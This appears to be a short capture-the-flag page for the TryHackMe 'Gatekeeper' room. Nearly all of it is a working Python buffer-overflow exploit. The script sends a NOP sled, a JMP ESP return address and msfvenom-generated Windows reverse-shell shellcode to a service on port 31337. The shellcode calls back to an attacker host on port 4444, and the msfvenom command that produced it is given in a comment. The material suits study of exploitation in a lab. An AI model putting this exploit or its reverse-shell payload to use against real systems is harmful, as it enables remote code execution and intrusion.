Skip to content

THM - gatekeeper

Exploit

#!/usr/bin/env python3
import socket, time, sys, subprocess


ip = "10.10.130.44"
port = 31337
enter = b"\r\n"

# msfvenom -p windows/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -b "\x00\x09\x0a" -f python EXITFUNC=thread

buf =  b""
buf += b"\xda\xd0\xbe\xa5\xbb\x49\xa1\xd9\x74\x24\xf4\x58\x33"
buf += b"\xc9\xb1\x52\x31\x70\x17\x83\xc0\x04\x03\xd5\xa8\xab"
buf += b"\x54\xe9\x27\xa9\x97\x11\xb8\xce\x1e\xf4\x89\xce\x45"
buf += b"\x7d\xb9\xfe\x0e\xd3\x36\x74\x42\xc7\xcd\xf8\x4b\xe8"
buf += b"\x66\xb6\xad\xc7\x77\xeb\x8e\x46\xf4\xf6\xc2\xa8\xc5"
buf += b"\x38\x17\xa9\x02\x24\xda\xfb\xdb\x22\x49\xeb\x68\x7e"
buf += b"\x52\x80\x23\x6e\xd2\x75\xf3\x91\xf3\x28\x8f\xcb\xd3"
buf += b"\xcb\x5c\x60\x5a\xd3\x81\x4d\x14\x68\x71\x39\xa7\xb8"
buf += b"\x4b\xc2\x04\x85\x63\x31\x54\xc2\x44\xaa\x23\x3a\xb7"
buf += b"\x57\x34\xf9\xc5\x83\xb1\x19\x6d\x47\x61\xc5\x8f\x84"
buf += b"\xf4\x8e\x9c\x61\x72\xc8\x80\x74\x57\x63\xbc\xfd\x56"
buf += b"\xa3\x34\x45\x7d\x67\x1c\x1d\x1c\x3e\xf8\xf0\x21\x20"
buf += b"\xa3\xad\x87\x2b\x4e\xb9\xb5\x76\x07\x0e\xf4\x88\xd7"
buf += b"\x18\x8f\xfb\xe5\x87\x3b\x93\x45\x4f\xe2\x64\xa9\x7a"
buf += b"\x52\xfa\x54\x85\xa3\xd3\x92\xd1\xf3\x4b\x32\x5a\x98"
buf += b"\x8b\xbb\x8f\x0f\xdb\x13\x60\xf0\x8b\xd3\xd0\x98\xc1"
buf += b"\xdb\x0f\xb8\xea\x31\x38\x53\x11\xd2\x4d\xb6\x10\x8d"
buf += b"\x3a\xb4\x22\xc0\xe6\x31\xc4\x88\x06\x14\x5f\x25\xbe"
buf += b"\x3d\x2b\xd4\x3f\xe8\x56\xd6\xb4\x1f\xa7\x99\x3c\x55"
buf += b"\xbb\x4e\xcd\x20\xe1\xd9\xd2\x9e\x8d\x86\x41\x45\x4d"
buf += b"\xc0\x79\xd2\x1a\x85\x4c\x2b\xce\x3b\xf6\x85\xec\xc1"
buf += b"\x6e\xed\xb4\x1d\x53\xf0\x35\xd3\xef\xd6\x25\x2d\xef"
buf += b"\x52\x11\xe1\xa6\x0c\xcf\x47\x11\xff\xb9\x11\xce\xa9"
buf += b"\x2d\xe7\x3c\x6a\x2b\xe8\x68\x1c\xd3\x59\xc5\x59\xec"
buf += b"\x56\x81\x6d\x95\x8a\x31\x91\x4c\x0f\x51\x70\x44\x7a"
buf += b"\xfa\x2d\x0d\xc7\x67\xce\xf8\x04\x9e\x4d\x08\xf5\x65"
buf += b"\x4d\x79\xf0\x22\xc9\x92\x88\x3b\xbc\x94\x3f\x3b\x95"

## !mona modules
## !mona jmp -r esp -m gatekeeper.exe

payload = (b"\x90" * 146)  + (b"\xc3\x14\x04\x08") + (b"\x90" * 10) + buf + (b"C" * 4) + enter

print("Pyadlod size: {} payload: {}".format(len(payload), payload))

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(5)
        s.connect((ip, port))
        print("Exploit with {} bytes".format(len(payload)))
        s.send(payload)
        print(s.recv(1024))
        s.close()
except Exception as e:
    print("Exploit crached at {} bytes error message {}".format(len(payload), e))
    sys.exit(0)